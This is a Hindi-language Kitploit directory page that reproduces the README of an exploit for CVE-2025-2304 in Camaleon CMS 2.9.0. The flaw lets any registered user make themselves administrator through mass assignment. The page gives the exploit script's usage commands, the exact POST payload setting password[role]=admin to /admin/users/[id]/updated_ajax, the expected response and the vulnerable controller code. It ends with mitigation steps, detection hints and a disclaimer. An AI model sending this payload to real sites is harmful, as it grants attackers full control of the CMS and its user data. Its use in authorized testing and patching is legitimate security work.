Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2304 — यह Python स्क्रिप्ट Camaleon CMS संस्करण 2.9.0 में एक क्रिटिकल मास असाइनमेंट भेद्यता का शोषण करती है, जो किसी भी पंजीकृत उपयोगकर्ता को अपने विशेषाधिकारों को व्यवस्थापक तक बढ़ाने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/csuribird/cve-2025-2304
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशनलर्निंग और शिक्षा
GitHubcsuribird/cve-2025-2304

CVE-2025-2304

यह Python स्क्रिप्ट Camaleon CMS संस्करण 2.9.0 में एक क्रिटिकल मास असाइनमेंट भेद्यता का शोषण करती है, जो किसी भी पंजीकृत उपयोगकर्ता को अपने विशेषाधिकारों को व्यवस्थापक तक बढ़ाने की अनुमति देती है।

5126 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2025-2304 - Camaleon CMS 2.9.0 - विशेषाधिकार वृद्धि शोषण

अवलोकन

यह Python स्क्रिप्ट Camaleon CMS संस्करण 2.9.0 में एक गंभीर mass assignment भेद्यता का शोषण करती है, जो किसी भी पंजीकृत उपयोगकर्ता को अपने विशेषाधिकारों को व्यवस्थापक स्तर तक बढ़ाने की अनुमति देती है।

भेद्यता विवरण

  • CVE: CVE-2025-2304 - UsersController#updated_ajax में Mass Assignment
  • प्रभावित संस्करण: Camaleon CMS 2.9.0
  • गंभीरता: गंभीर
  • वेक्टर: updated_ajax क्रिया में permit! विधि बिना फ़िल्टरिंग के सभी पैरामीटरों को पारित होने देती है, जिसमें role पैरामीटर भी शामिल है

शोषण कैसे काम करता है

  1. प्रमाणीकरण: स्क्रिप्ट पहले एक सामान्य पंजीकृत उपयोगकर्ता के रूप में लॉग इन करती है
  2. शोषण: यह एक दुर्भावनापूर्ण पेलोड के साथ /admin/users/[id]/updated_ajax पर POST अनुरोध भेजता है: (स्क्रिप्ट में मैंने id 5 का उपयोग किया है क्योंकि यह आमतौर पर स्वचालित रूप से निर्दिष्ट होता है। इसे बदलने की आवश्यकता हो सकती है।)
    • password[role]=admin - यह पैरामीटर फ़िल्टर होना चाहिए, लेकिन permit! के कारण नहीं होता
    • password[password] और password[password_confirmation] - उपयोगकर्ता का पासवर्ड अपडेट करता है (जब कोई सामान्य उपयोगकर्ता क्लाइंट भूमिका के साथ अपनी प्रोफ़ाइल अपडेट करता है, तो यह तकनीकी रूप से user[role]=client होता है, लेकिन चूंकि हम यहाँ change password कार्यक्षमता से उत्पन्न भेद्यता का शोषण कर रहे हैं, यह password[role]=admin होगा।)
  3. विशेषाधिकार वृद्धि: उपयोगकर्ता की भूमिका सामान्य उपयोगकर्ता से व्यवस्थापक में बदल जाती है
  4. सत्यापन: स्क्रिप्ट सफलता की पुष्टि करने के लिए केवल-व्यवस्थापक एंडपॉइंट्स तक पहुँचने का प्रयास करती है

स्थापना

root@kitploit:~
pip install -r requirements.txt

उपयोग

root@kitploit:~
python camaleon_cms_privilege_escalation.py --url http://target-cms.com --username regularuser --password userpassword

वैकल्पिक पैरामीटर

  • --new-password: शोषण के दौरान एक नया पासवर्ड सेट करें (डिफ़ॉल्ट रूप से वर्तमान पासवर्ड)

उदाहरण

root@kitploit:~
python camaleon_cms_privilege_escalation.py \
    --url http://192.168.1.100 \
    --username testuser \
    --password testpass123 \
    --new-password newadminpass

तकनीकी विवरण

भेद्य कोड स्थान

भेद्यता UsersController की updated_ajax विधि में मौजूद है:

root@kitploit:~
def updated_ajax
  # भेद्य कोड - विशिष्ट पैरामीटर फ़िल्टरिंग के बजाय permit! का उपयोग करता है
  @user.update(params.require(:user).permit!)
  # यह किसी भी पैरामीटर को mass-assign करने की अनुमति देता है, जिसमें role भी शामिल है
end

दुर्भावनापूर्ण पेलोड

root@kitploit:~
POST /admin/users/[id]/updated_ajax
Content-Type: application/x-www-form-urlencoded

password[password]=newpass123&password[password_confirmation]=newpass123&password[role]=admin&_method=patch

अपेक्षित प्रतिक्रिया

root@kitploit:~
{
  "success": true,
  "message": "User updated successfully"
}

प्रभाव

  • विशेषाधिकार वृद्धि: सामान्य उपयोगकर्ता व्यवस्थापक पहुँच प्राप्त कर सकते हैं
  • पूर्ण सिस्टम समझौता: व्यवस्थापक पहुँच CMS पर पूर्ण नियंत्रण की अनुमति देती है
  • डेटा उल्लंघन: सभी उपयोगकर्ता डेटा और सामग्री तक पहुँच
  • स्थायित्व: बैकडोर बनाने और पहुँच बनाए रखने की क्षमता

शमन

डेवलपर्स के लिए

भेद्य permit! विधि को स्पष्ट पैरामीटर फ़िल्टरिंग से बदलें:

root@kitploit:~
def updated_ajax
  @user.update(params.require(:user).permit(:password, :password_confirmation, :email))
  # स्पष्ट रूप से बाहर करें: role पैरामीटर
end

सिस्टम प्रशासकों के लिए

  1. Camaleon CMS के पैच किए गए संस्करण (2.9.1) में अपग्रेड करें
  2. भूमिका-आधारित पहुँच नियंत्रण लागू करें
  3. इनपुट सत्यापन और पैरामीटर फ़िल्टरिंग जोड़ें
  4. संदिग्ध विशेषाधिकार वृद्धि प्रयासों की निगरानी करें

कानूनी अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। कृपया उन सिस्टमों पर इस शोषण का उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

पहचान

सुरक्षा टीमें निम्नलिखित की निगरानी करके शोषण प्रयासों का पता लगा सकती हैं:

  • password[role] पैरामीटर के साथ /admin/users/[id]/updated_ajax पर POST अनुरोध
  • उपयोगकर्ता खातों में अप्रत्याशित भूमिका परिवर्तन
  • ऑडिट लॉग में विशेषाधिकार वृद्धि पैटर्न

संदर्भ

  • Mass Assignment भेद्यता दस्तावेज़ीकरण
  • Ruby on Rails सुरक्षा दिशानिर्देश
  • Camaleon CMS सुरक्षा सलाहकार
टूल डाउनलोड करें